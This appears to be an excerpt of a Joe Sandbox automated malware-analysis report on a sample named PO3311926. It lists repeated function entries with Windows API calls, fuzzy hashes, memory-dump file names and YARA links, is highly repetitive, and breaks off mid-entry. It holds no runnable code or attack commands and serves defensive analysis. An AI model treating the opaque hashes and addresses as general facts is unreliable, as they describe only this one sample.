Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 90c52bdfdba522c8f919ecbc21ec18ed1ea6a6610682aa46bc9c249ebb661062
Instruction ID: 4cfc6d1b1715f41f5bea9fc4de46ce542861f332f1cab708efecf4a1be85aa56
Opcode Fuzzy Hash: 90c52bdfdba522c8f919ecbc21ec18ed1ea6a6610682aa46bc9c249ebb661062
Instruction Fuzzy Hash: BCF08C3620031A9FCF128EA8EC14F9F77E9EB01F207548169FA15E7190EB31DA20D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2186f76d19f01313a91b8ee4e3b2d4286f48ce90cdbd346c8776365bdfa1e016
Instruction ID: 357a680f628263051d88edaa869c671298c6fe1b551a788a55c72db6ff1a19f6
Opcode Fuzzy Hash: 2186f76d19f01313a91b8ee4e3b2d4286f48ce90cdbd346c8776365bdfa1e016
Instruction Fuzzy Hash: 54E06D3160622767EB7226A59C09F9F76C8DF817A4F1501E9BC18AB092DF21CC0186E1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA5AC2

Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9ce9c541a568a2f583813ba9c6d1543de699fc0b5c4fa552f5be15a877f1260a
Instruction ID: cf928897c17cdd3e5f0eaf9edde89dfdb94277303a2c1fefb31cf276c6eb655b
Opcode Fuzzy Hash: 9ce9c541a568a2f583813ba9c6d1543de699fc0b5c4fa552f5be15a877f1260a
Instruction Fuzzy Hash: 97016930924690DAD729F7A8C0517FEFBF49F64304F5084CEA46663282CBB41B08D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00BA95D6,?,?,?,?,?,00BD2641,000000FF), ref: 00BA963B

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a67de794b8fcd4d40e4135f0bc77064e433e988c0dc92aab874ec73f896c4746
Instruction ID: a82e77051261c77f69a8e092c3bbd3f0a90f7d88666c76756b3f4381836cf4d0
Opcode Fuzzy Hash: a67de794b8fcd4d40e4135f0bc77064e433e988c0dc92aab874ec73f896c4746
Instruction Fuzzy Hash: 9BF0BE7008AB059FDB308E28C558B92B7E8EF13321F040B9E90E2429E0D770698DAA40

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00BAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6C4
Part of subcall function 00BAA69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6F2
Part of subcall function 00BAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 0b853ac186c8c505b962c5b6c2151e48ebcd418ce1e1f2d7862c3a0238922e7c
Instruction ID: 0f543557c46e7295b51dbe2b6d24631d8b0f58622552937f378d60b8f064a30b
Opcode Fuzzy Hash: 0b853ac186c8c505b962c5b6c2151e48ebcd418ce1e1f2d7862c3a0238922e7c
Instruction Fuzzy Hash: 65F05E3140D790AACA225BB48904BCABBD06F2B321F048A8AF1F952196C36550A4DB33

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00BB0E3D

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 0ede0f9781981de8e303615275928f493c7a1c7740e34a99776dd9db8b3a32b8
Instruction ID: d4aedb9b678c68b8d4d41cefd23b2464e3477648120cfa2a953bef2c2bb1f78e
Opcode Fuzzy Hash: 0ede0f9781981de8e303615275928f493c7a1c7740e34a99776dd9db8b3a32b8
Instruction Fuzzy Hash: 1ED0C221A1A09417DB21332C68757FF26C6CFC7320F0C08E6B1455B183DE944882A262

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00BBA62C

Part of subcall function 00BBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BBA3DA

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 2a2a9f31c99a2acc5674450d9cad253d684315b208a9a2892a0f7db99a937e73
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 2AD0C9B1A10209BBDF466F618C529FE7AD9EB00340F0481A5B842D5192EEF1E910A666

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00BBE5E3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 903204d0013fba60ba0e1fa355ab3232a0f8fb366764f439864ca25a4a8bd414
Instruction ID: 28c6dc4895f39bb4a9edf18e851ee28cef3aec9c4e08ac4f53a8386c20d7c692
Opcode Fuzzy Hash: 903204d0013fba60ba0e1fa355ab3232a0f8fb366764f439864ca25a4a8bd414
Instruction Fuzzy Hash: 29D0C9B01802409BE622EBA99886BF877D4B724705FA80191B569924B5DBE4C481C615

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BB1B3E), ref: 00BBDD92

Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 4b2f0309c6825968b281260e7d19866eabaece2e465799e746ad710e858cab0e
Instruction ID: bfc667189c9b0000a0189f6c936880ce646b6ec6b0757c274c6754dcce313fd8
Opcode Fuzzy Hash: 4b2f0309c6825968b281260e7d19866eabaece2e465799e746ad710e858cab0e
Instruction Fuzzy Hash: 43D09E31154340BBDA112B51DD06F5F7AE6AB98B04F004594B285740F18AB2DD21DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00BA98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00BA97BE), ref: 00BA98C8

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 48a7fb012598134a5dbdb23bd46f1d5638a98befb9c332c3062fc72001a27df6
Instruction ID: e564eb5a92220abb11d9364fa9332ae5dc09631c4c2c069330520ac66bb44165
Opcode Fuzzy Hash: 48a7fb012598134a5dbdb23bd46f1d5638a98befb9c332c3062fc72001a27df6
Instruction Fuzzy Hash: 8EC01238408205868E208B249848099B3A2EE537E67B486D4C0388A0E2C32ACC87FA11

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c14ea71a1d54747e529bf36bcff3f90f623037484e4ec26bcd608171c33c7e5
Instruction ID: 769aa33f161ba3b7afc27ddc446731c3e2a986ad76dadd8bf907502a7dc291e2
Opcode Fuzzy Hash: 3c14ea71a1d54747e529bf36bcff3f90f623037484e4ec26bcd608171c33c7e5
Instruction Fuzzy Hash: C7B012E1258141EE350452096C03CFB01CDC0C5B10330C0BFFC25C02E0F8C0EC044471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ca2a0e108d50411e120310cb8fa60577801a90ed275e8ed8dedb66170b249429
Instruction ID: e462d60dce24eb14fb20c87c660e64d25281ca35693b358879716cf626e7645c
Opcode Fuzzy Hash: ca2a0e108d50411e120310cb8fa60577801a90ed275e8ed8dedb66170b249429
Instruction Fuzzy Hash: 3EB092E5258141AE350451496C42CBB01CDD088B1033080AAB825C01A0E880AC004531

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 89ed5e6f6fec5d1e22b7b595418615b2b96d274d41fc85de5394e1143e2dd532
Instruction ID: e7c26191aafc05ce2e0739d32266ea653d20a0b683c6c4391781299586956f84
Opcode Fuzzy Hash: 89ed5e6f6fec5d1e22b7b595418615b2b96d274d41fc85de5394e1143e2dd532
Instruction Fuzzy Hash: 34B092E5258141AE250411496C42CBB018DC085B10330C4AAB821D04A0E880EC004471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5b0dee73a631096e1499db2a8e304fd1353967a670a0af26ee93d50acfa190d1
Instruction ID: 990b91995d0ce80d16d2b03ffcac193de912d95c1a68fe886fcccdfab337f6e6
Opcode Fuzzy Hash: 5b0dee73a631096e1499db2a8e304fd1353967a670a0af26ee93d50acfa190d1
Instruction Fuzzy Hash: 63B012E1258041AE350451096C03CFB01CDD0C8F10330C4BFF825C01E0F8C0EC404431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 777ba39b5e2f6be3b6f8c5a5d13f1738c7c0dab78e96d8e0bfce0304d33dfaa4
Instruction ID: e89ff77e0034de3e7e38fffc6dfe3528a9a8aba8311364736fdb328905ecf53b
Opcode Fuzzy Hash: 777ba39b5e2f6be3b6f8c5a5d13f1738c7c0dab78e96d8e0bfce0304d33dfaa4
Instruction Fuzzy Hash: 58B012F1258041AE3504510A6D03CFB41DDC0C4B10330C0BFF825C01E0FCC0ED014431

Uniqueness

Uniqueness Score: -1.00%

Function 00BBEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBEAF9

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1bce09b426158f3efbaf9d71db3a28e00cb03bc0c7ec68ddb2ca78837b2fab12
Instruction ID: bc5b25e7b66ce5d039de28b861ed5491b0f9aa0e2ad90f1651fd107e8d369fbd
Opcode Fuzzy Hash: 1bce09b426158f3efbaf9d71db3a28e00cb03bc0c7ec68ddb2ca78837b2fab12
Instruction Fuzzy Hash: DDB092CA29A4827E290462015E82CB6498DC4C0B9032080AAB420C80A2E8C088014471

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e84aa5dafaa8f7dc0a10fcc62056a2a88d51740498120c120bf4b2feecc4e63a
Instruction ID: a9003eb86a3f5949ca9d528943bf91145bd1f2f8e273be97ee1e05a96fa2e551
